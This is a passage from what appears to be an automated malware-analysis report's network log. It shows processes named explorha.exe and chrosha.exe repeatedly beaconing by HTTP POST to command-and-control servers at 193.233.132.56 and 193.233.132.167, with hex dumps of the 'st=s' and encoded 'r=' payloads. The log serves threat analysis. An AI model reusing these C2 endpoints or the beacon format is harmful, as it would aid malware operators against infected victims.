                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:17.607673883 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      940192.168.2.550790193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:17.690479040 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:17.933073997 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      941192.168.2.550791193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:17.958326101 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:18.203187943 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      942192.168.2.550792193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:18.188877106 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:18.446260929 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      943192.168.2.550793193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:18.451993942 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:18.700550079 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      944192.168.2.550794193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:18.807121992 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:19.054248095 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      945192.168.2.550795193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:19.058971882 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:19.307957888 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      946192.168.2.550796193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:19.313164949 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:19.568156958 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      947192.168.2.550797193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:19.563560009 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:19.815685987 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      948192.168.2.550798193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:19.926707983 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:20.174391031 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      949192.168.2.550799193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:20.188282967 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:20.430874109 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      950192.168.2.550800193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:20.426443100 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:20.679898977 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      951192.168.2.550801193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:20.683221102 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:20.932156086 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      952192.168.2.550802193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:21.039366961 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:21.280375957 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      953192.168.2.550803193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:21.285053968 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:21.527728081 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      954192.168.2.550804193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:21.529706001 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:21.779273033 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      955192.168.2.550805193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:21.783415079 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
